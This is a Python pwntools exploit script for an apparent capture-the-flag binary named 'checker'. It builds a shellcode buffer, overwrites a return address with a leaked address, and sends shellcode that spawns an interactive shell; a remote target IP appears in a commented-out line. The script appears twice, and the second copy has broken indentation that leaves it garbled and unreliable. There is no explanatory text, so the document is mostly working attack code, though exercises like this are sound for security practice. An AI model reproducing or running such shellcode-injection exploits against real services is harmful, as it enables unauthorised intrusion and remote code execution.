d4em0n/exploit_bytechecker.py

## exploit_bytechecker.py
from pwn import *
import sys
# NOTE : Tekan CTRL+D pada saat shell interactive pertama
ch = process('./checker')
#ch = remote("35.197.134.203", 8031)
context.terminal = ['tmux', 'splitw', '-h']
gdb_cmd = """
source /home/ramdhan/ctf/tools/peda/peda.py
b* 0x08048E50
"""
#gdb.attach(ch, gdb_cmd)

shc = """
mov al,3
int 0x80
nop
nop
nop
"""

code = asm(shc)
print(len(code))
sh = list(code.ljust(144, "\x00"))
l = len(code)
st = (l+1)/8
for i in range(l, 144, 8):
    sh[i] = chr(st)
    st += 1
ch.recvuntil("= ")
addr = p32(int(ch.recvline(), 16))
print(hex(u32(addr)))
l = 136
for i in range(4):
    sh[l+i] = addr[i]
sh = "".join(sh)
ch.send(sh)
ch.interactive()
ch.sendline("AAAA" + asm(shellcraft.sh()))
ch.interactive()
	from pwn import *
	import sys
	# NOTE : Tekan CTRL+D pada saat shell interactive pertama
	ch = process('./checker')
	#ch = remote("35.197.134.203", 8031)
	context.terminal = ['tmux', 'splitw', '-h']
	gdb_cmd = """
	source /home/ramdhan/ctf/tools/peda/peda.py
	b* 0x08048E50
	"""
	#gdb.attach(ch, gdb_cmd)

	shc = """
	mov al,3
	int 0x80
	nop
	nop
	nop
	"""

	code = asm(shc)
	print(len(code))
	sh = list(code.ljust(144, "\x00"))
	l = len(code)
	st = (l+1)/8
	for i in range(l, 144, 8):
	sh[i] = chr(st)
	st += 1
	ch.recvuntil("= ")
	addr = p32(int(ch.recvline(), 16))
	print(hex(u32(addr)))
	l = 136
	for i in range(4):
	sh[l+i] = addr[i]
	sh = "".join(sh)
	ch.send(sh)
	ch.interactive()
	ch.sendline("AAAA" + asm(shellcraft.sh()))
	ch.interactive()